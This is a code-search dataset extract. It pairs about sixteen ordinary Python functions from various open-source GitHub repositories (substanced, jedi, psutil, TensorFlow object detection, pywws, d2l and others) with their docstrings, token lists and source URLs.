def load( self, directory, parent=None, subresources=True, verbose=False, dry_run=False, registry=None ): """ Load a dump of a resource and return the resource.""" if registry is None: registry = get_current_registry() self.set_yaml(registry) stack = [(self.ospath.abspath(self.ospath.normpath(directory)), parent)] first = None dumpers = self.get_dumpers(registry) while stack: # breadth-first is easiest directory, parent = stack.pop() context = self._make_load_context( directory, registry, dumpers, verbose, dry_run ) self.logger.info('Loading %s' % directory) resource = context.load(parent) if first is None: first = resource if not subresources: break subobjects_dir = self.ospath.join(directory, RESOURCES_DIRNAME) if self.ospath.exists(subobjects_dir): for fn in self.oslistdir(subobjects_dir): fullpath = self.ospath.join(subobjects_dir, fn) subresource_fn = self.ospath.join( fullpath, RESOURCE_FILENAME ) if ( self.ospath.isdir(fullpath) and self.ospath.exists(subresource_fn) ): stack.append((fullpath, resource)) callbacks = registry.pop('loader_callbacks', ()) for callback in callbacks: callback(first) return first
[ "def", "load", "(", "self", ",", "directory", ",", "parent", "=", "None", ",", "subresources", "=", "True", ",", "verbose", "=", "False", ",", "dry_run", "=", "False", ",", "registry", "=", "None", ")", ":", "if", "registry", "is", "None", ":", "regi...
https://github.com/Pylons/substanced/blob/a897f4a0518c51b6e093cc5af39fa326f23752c2/substanced/dump/__init__.py#L191-L250
paulwinex/pw_MultiScriptEditor
e447e99f87cb07e238baf693b7e124e50efdbc51
multi_script_editor/jedi/evaluate/helpers.py
python
search_call_signatures
(user_stmt, position)
return call, index
Returns the function Call that matches the position before.
Returns the function Call that matches the position before.
[ "Returns", "the", "function", "Call", "that", "matches", "the", "position", "before", "." ]
def search_call_signatures(user_stmt, position): """ Returns the function Call that matches the position before. """ debug.speed('func_call start') call, index = None, 0 if user_stmt is not None and isinstance(user_stmt, pr.Statement): # some parts will of the statement will be removed user_stmt = fast_parent_copy(user_stmt) arr, index = call_signature_array_for_pos(user_stmt, position) if arr is not None: call = arr.parent debug.speed('func_call parsed') return call, index
[ "def", "search_call_signatures", "(", "user_stmt", ",", "position", ")", ":", "debug", ".", "speed", "(", "'func_call start'", ")", "call", ",", "index", "=", "None", ",", "0", "if", "user_stmt", "is", "not", "None", "and", "isinstance", "(", "user_stmt", ...
https://github.com/paulwinex/pw_MultiScriptEditor/blob/e447e99f87cb07e238baf693b7e124e50efdbc51/multi_script_editor/jedi/evaluate/helpers.py#L114-L128
dpgaspar/Flask-AppBuilder
557249f33b66d02a48c1322ef21324b815abe18e
flask_appbuilder/cli.py
python
fab
()
FAB flask group commands
FAB flask group commands
[ "FAB", "flask", "group", "commands" ]
def fab(): """ FAB flask group commands""" pass
[ "def", "fab", "(", ")", ":", "pass" ]
https://github.com/dpgaspar/Flask-AppBuilder/blob/557249f33b66d02a48c1322ef21324b815abe18e/flask_appbuilder/cli.py#L32-L34
Azure/azure-linux-extensions
a42ef718c746abab2b3c6a21da87b29e76364558
Common/libpsutil/py2.6-glibc-2.12-pre/psutil/__init__.py
python
_assert_pid_not_reused
(fun)
return wrapper
Decorator which raises NoSuchProcess in case a process is no longer running or its PID has been reused.
Decorator which raises NoSuchProcess in case a process is no longer running or its PID has been reused.
[ "Decorator", "which", "raises", "NoSuchProcess", "in", "case", "a", "process", "is", "no", "longer", "running", "or", "its", "PID", "has", "been", "reused", "." ]
def _assert_pid_not_reused(fun): """Decorator which raises NoSuchProcess in case a process is no longer running or its PID has been reused. """ @functools.wraps(fun) def wrapper(self, *args, **kwargs): if not self.is_running(): raise NoSuchProcess(self.pid, self._name) return fun(self, *args, **kwargs) return wrapper
[ "def", "_assert_pid_not_reused", "(", "fun", ")", ":", "@", "functools", ".", "wraps", "(", "fun", ")", "def", "wrapper", "(", "self", ",", "*", "args", ",", "*", "*", "kwargs", ")", ":", "if", "not", "self", ".", "is_running", "(", ")", ":", "rais...
https://github.com/Azure/azure-linux-extensions/blob/a42ef718c746abab2b3c6a21da87b29e76364558/Common/libpsutil/py2.6-glibc-2.12-pre/psutil/__init__.py#L265-L274
ambakick/Person-Detection-and-Tracking
f925394ac29b5cf321f1ce89a71b193381519a0b
core/prefetcher.py
python
prefetch
(tensor_dict, capacity)
return prefetch_queue
Creates a prefetch queue for tensors. Creates a FIFO queue to asynchronously enqueue tensor_dicts and returns a dequeue op that evaluates to a tensor_dict. This function is useful in prefetching preprocessed tensors so that the data is readily available for consumers. Example input pipeline when you don't need batching: ---------------------------------------------------- key, string_tensor = slim.parallel_reader.parallel_read(...) tensor_dict = decoder.decode(string_tensor) tensor_dict = preprocessor.preprocess(tensor_dict, ...) prefetch_queue = prefetcher.prefetch(tensor_dict, capacity=20) tensor_dict = prefetch_queue.dequeue() outputs = Model(tensor_dict) ... ---------------------------------------------------- For input pipelines with batching, refer to core/batcher.py Args: tensor_dict: a dictionary of tensors to prefetch. capacity: the size of the prefetch queue. Returns: a FIFO prefetcher queue
Creates a prefetch queue for tensors.
[ "Creates", "a", "prefetch", "queue", "for", "tensors", "." ]
def prefetch(tensor_dict, capacity): """Creates a prefetch queue for tensors. Creates a FIFO queue to asynchronously enqueue tensor_dicts and returns a dequeue op that evaluates to a tensor_dict. This function is useful in prefetching preprocessed tensors so that the data is readily available for consumers. Example input pipeline when you don't need batching: ---------------------------------------------------- key, string_tensor = slim.parallel_reader.parallel_read(...) tensor_dict = decoder.decode(string_tensor) tensor_dict = preprocessor.preprocess(tensor_dict, ...) prefetch_queue = prefetcher.prefetch(tensor_dict, capacity=20) tensor_dict = prefetch_queue.dequeue() outputs = Model(tensor_dict) ... ---------------------------------------------------- For input pipelines with batching, refer to core/batcher.py Args: tensor_dict: a dictionary of tensors to prefetch. capacity: the size of the prefetch queue. Returns: a FIFO prefetcher queue """ names = list(tensor_dict.keys()) dtypes = [t.dtype for t in tensor_dict.values()] shapes = [t.get_shape() for t in tensor_dict.values()] prefetch_queue = tf.PaddingFIFOQueue(capacity, dtypes=dtypes, shapes=shapes, names=names, name='prefetch_queue') enqueue_op = prefetch_queue.enqueue(tensor_dict) tf.train.queue_runner.add_queue_runner(tf.train.queue_runner.QueueRunner( prefetch_queue, [enqueue_op])) tf.summary.scalar('queue/%s/fraction_of_%d_full' % (prefetch_queue.name, capacity), tf.to_float(prefetch_queue.size()) * (1. / capacity)) return prefetch_queue
[ "def", "prefetch", "(", "tensor_dict", ",", "capacity", ")", ":", "names", "=", "list", "(", "tensor_dict", ".", "keys", "(", ")", ")", "dtypes", "=", "[", "t", ".", "dtype", "for", "t", "in", "tensor_dict", ".", "values", "(", ")", "]", "shapes", ...
https://github.com/ambakick/Person-Detection-and-Tracking/blob/f925394ac29b5cf321f1ce89a71b193381519a0b/core/prefetcher.py#L20-L61
out0fmemory/GoAgent-Always-Available
c4254984fea633ce3d1893fe5901debd9f22c2a9
server/lib/google/appengine/datastore/datastore_query.py
python
PropertyFilter._to_pb
(self)
return self._filter
Returns the internal only pb representation.
Returns the internal only pb representation.
[ "Returns", "the", "internal", "only", "pb", "representation", "." ]
def _to_pb(self): """Returns the internal only pb representation.""" return self._filter
[ "def", "_to_pb", "(", "self", ")", ":", "return", "self", ".", "_filter" ]
https://github.com/out0fmemory/GoAgent-Always-Available/blob/c4254984fea633ce3d1893fe5901debd9f22c2a9/server/lib/google/appengine/datastore/datastore_query.py#L365-L367
zhl2008/awd-platform
0416b31abea29743387b10b3914581fbe8e7da5e
web_hxb2/lib/python3.5/site-packages/pip/_vendor/html5lib/treewalkers/dom.py
python
TreeWalker.getParentNode
(self, node)
return node.parentNode
[]
def getParentNode(self, node): return node.parentNode
[ "def", "getParentNode", "(", "self", ",", "node", ")", ":", "return", "node", ".", "parentNode" ]
https://github.com/zhl2008/awd-platform/blob/0416b31abea29743387b10b3914581fbe8e7da5e/web_hxb2/lib/python3.5/site-packages/pip/_vendor/html5lib/treewalkers/dom.py#L42-L43
Mindwerks/worldengine
64dff8eb7824ce46b5b6cb8006bcef21822ef144
worldengine/model/world.py
python
World.has_biome
(self)
return 'biome' in self.layers
[]
def has_biome(self): return 'biome' in self.layers
[ "def", "has_biome", "(", "self", ")", ":", "return", "'biome'", "in", "self", ".", "layers" ]
https://github.com/Mindwerks/worldengine/blob/64dff8eb7824ce46b5b6cb8006bcef21822ef144/worldengine/model/world.py#L912-L913
vipul-sharma20/sharingan
25504394fccbade08a3903adfebeccab61410340
sharingan/main.py
python
Image._crop_poly
(self, name, *args, **kwargs)
Crop by the coordinates of mouse clicks :returns: None
Crop by the coordinates of mouse clicks
[ "Crop", "by", "the", "coordinates", "of", "mouse", "clicks" ]
def _crop_poly(self, name, *args, **kwargs): """ Crop by the coordinates of mouse clicks :returns: None """ mask = np.zeros(self.gray.shape, dtype=np.uint8) roi_corners = np.array([self.path], dtype=np.int32) channel_count = 2 ignore_mask_color = (255,) * channel_count cv2.fillPoly(mask, roi_corners, ignore_mask_color) masked_image = cv2.bitwise_and(self.gray, mask) cv2.imwrite(SEGMENTED_PLACEHOLDER.format(name=name), masked_image)
[ "def", "_crop_poly", "(", "self", ",", "name", ",", "*", "args", ",", "*", "*", "kwargs", ")", ":", "mask", "=", "np", ".", "zeros", "(", "self", ".", "gray", ".", "shape", ",", "dtype", "=", "np", ".", "uint8", ")", "roi_corners", "=", "np", "...
https://github.com/vipul-sharma20/sharingan/blob/25504394fccbade08a3903adfebeccab61410340/sharingan/main.py#L184-L198
heldersepu/GMapCatcher
0fcd85742d54449d679acf52cc019e93fdc402fe
gmapcatcher/pyGPSD/nmea/serial/serialposix.py
python
PosixSerial.flush
(self)
Flush of file like objects. In this case, wait until all data is written.
Flush of file like objects. In this case, wait until all data is written.
[ "Flush", "of", "file", "like", "objects", ".", "In", "this", "case", "wait", "until", "all", "data", "is", "written", "." ]
def flush(self): """Flush of file like objects. In this case, wait until all data is written.""" self.drainOutput()
[ "def", "flush", "(", "self", ")", ":", "self", ".", "drainOutput", "(", ")" ]
https://github.com/heldersepu/GMapCatcher/blob/0fcd85742d54449d679acf52cc019e93fdc402fe/gmapcatcher/pyGPSD/nmea/serial/serialposix.py#L487-L490
dannguyen/watson-word-watcher
c487291b0efee6da3a5de470c7bffae5728ffb3b
foo/wrangle.py
python
extract_line_level_data
(data)
return lines
data (dict): as derived from standard Watson API JSON returns: a list of dictionary, each sub-list representing a line: { "start": 1.42, "end": 3.8, "confidence": 0.999, "words": [ { "text": "Hello", "start": 1.42, "end": 2.4, "confidence": 0.93 } ] }
data (dict): as derived from standard Watson API JSON
[ "data", "(", "dict", ")", ":", "as", "derived", "from", "standard", "Watson", "API", "JSON" ]
def extract_line_level_data(data): """ data (dict): as derived from standard Watson API JSON returns: a list of dictionary, each sub-list representing a line: { "start": 1.42, "end": 3.8, "confidence": 0.999, "words": [ { "text": "Hello", "start": 1.42, "end": 2.4, "confidence": 0.93 } ] } """ lines = [] for result in data['results']: if result.get('alternatives'): # just pick best alternative alt = result.get('alternatives')[0] timestamps = alt['timestamps'] if timestamps: # for some reason, timestamps can be empty in some cases words = [] word_confidences = alt['word_confidence'] for idx, tobject in enumerate(alt['timestamps']): txt, tstart, tend = tobject word = OrderedDict() word["start"] = tstart word["end"] = tend word['confidence'] = word_confidences[idx][1] word["text"] = txt words.append(word) line = OrderedDict() line['start'] = words[0]['start'] line['end'] = words[-1]['end'] line['confidence'] = alt['confidence'] line['word_count'] = len(words) line['words'] = words lines.append(line) return lines
[ "def", "extract_line_level_data", "(", "data", ")", ":", "lines", "=", "[", "]", "for", "result", "in", "data", "[", "'results'", "]", ":", "if", "result", ".", "get", "(", "'alternatives'", ")", ":", "# just pick best alternative", "alt", "=", "result", "...
https://github.com/dannguyen/watson-word-watcher/blob/c487291b0efee6da3a5de470c7bffae5728ffb3b/foo/wrangle.py#L158-L202
ant4g0nist/lisa.py
fb74a309a314d041d4902944a8d449650afc76db
lisa.py
python
Mach.__init__
(self, debugger)
[]
def __init__(self, debugger): self.magic = Mach.Magic() self.content = None self.path = None self.debugger = debugger
[ "def", "__init__", "(", "self", ",", "debugger", ")", ":", "self", ".", "magic", "=", "Mach", ".", "Magic", "(", ")", "self", ".", "content", "=", "None", "self", ".", "path", "=", "None", "self", ".", "debugger", "=", "debugger" ]
https://github.com/ant4g0nist/lisa.py/blob/fb74a309a314d041d4902944a8d449650afc76db/lisa.py#L1065-L1069
jim-easterbrook/pywws
31519ade415545e9cd711237b98aad33d070c1f9
src/pywws/sqlite3data.py
python
CoreStore.__delitem__
(self, i)
Delete the data item or items with index i. i must be a datetime object or a slice. If i is a single datetime then a value with that index must exist.
Delete the data item or items with index i. i must be a datetime object or a slice. If i is a single datetime then a value with that index must exist.
[ "Delete", "the", "data", "item", "or", "items", "with", "index", "i", ".", "i", "must", "be", "a", "datetime", "object", "or", "a", "slice", ".", "If", "i", "is", "a", "single", "datetime", "then", "a", "value", "with", "that", "index", "must", "exis...
def __delitem__(self, i): """Delete the data item or items with index i. i must be a datetime object or a slice. If i is a single datetime then a value with that index must exist. """ predicate, multi, params = self._predicate(i) with self._connection as con: if con.execute("DELETE FROM {} {};".format( self.table, predicate ), params).rowcount == 0 and multi is False: raise KeyError(i)
[ "def", "__delitem__", "(", "self", ",", "i", ")", ":", "predicate", ",", "multi", ",", "params", "=", "self", ".", "_predicate", "(", "i", ")", "with", "self", ".", "_connection", "as", "con", ":", "if", "con", ".", "execute", "(", "\"DELETE FROM {} {}...
https://github.com/jim-easterbrook/pywws/blob/31519ade415545e9cd711237b98aad33d070c1f9/src/pywws/sqlite3data.py#L410-L422
d2l-ai/d2l-en
39a7d4174534740b2387b0dc5eb22f409b82ee10
d2l/mxnet.py
python
RNNLMScratch.forward
(self, X, state=None)
return self.output_layer(rnn_outputs)
Defined in :numref:`sec_rnn-scratch`
Defined in :numref:`sec_rnn-scratch`
[ "Defined", "in", ":", "numref", ":", "sec_rnn", "-", "scratch" ]
def forward(self, X, state=None): """Defined in :numref:`sec_rnn-scratch`""" embs = self.one_hot(X) rnn_outputs, _ = self.rnn(embs, state) return self.output_layer(rnn_outputs)
[ "def", "forward", "(", "self", ",", "X", ",", "state", "=", "None", ")", ":", "embs", "=", "self", ".", "one_hot", "(", "X", ")", "rnn_outputs", ",", "_", "=", "self", ".", "rnn", "(", "embs", ",", "state", ")", "return", "self", ".", "output_lay...
https://github.com/d2l-ai/d2l-en/blob/39a7d4174534740b2387b0dc5eb22f409b82ee10/d2l/mxnet.py#L736-L740
vmware-archive/liota
9dde472542edd6d1ee01f66e7d78161dfa993f8f
liota/entities/edge_systems/general_edge_system.py
python
GeneralEdgeSystem.__init__
(self, name)
Init method for GeneralEdgeSystem :param name: GeneralEdgeSystem name
Init method for GeneralEdgeSystem :param name: GeneralEdgeSystem name
[ "Init", "method", "for", "GeneralEdgeSystem", ":", "param", "name", ":", "GeneralEdgeSystem", "name" ]
def __init__(self, name): """ Init method for GeneralEdgeSystem :param name: GeneralEdgeSystem name """ super(GeneralEdgeSystem, self).__init__( name=name, entity_id=systemUUID().get_uuid(name) )
[ "def", "__init__", "(", "self", ",", "name", ")", ":", "super", "(", "GeneralEdgeSystem", ",", "self", ")", ".", "__init__", "(", "name", "=", "name", ",", "entity_id", "=", "systemUUID", "(", ")", ".", "get_uuid", "(", "name", ")", ")" ]
https://github.com/vmware-archive/liota/blob/9dde472542edd6d1ee01f66e7d78161dfa993f8f/liota/entities/edge_systems/general_edge_system.py#L41-L49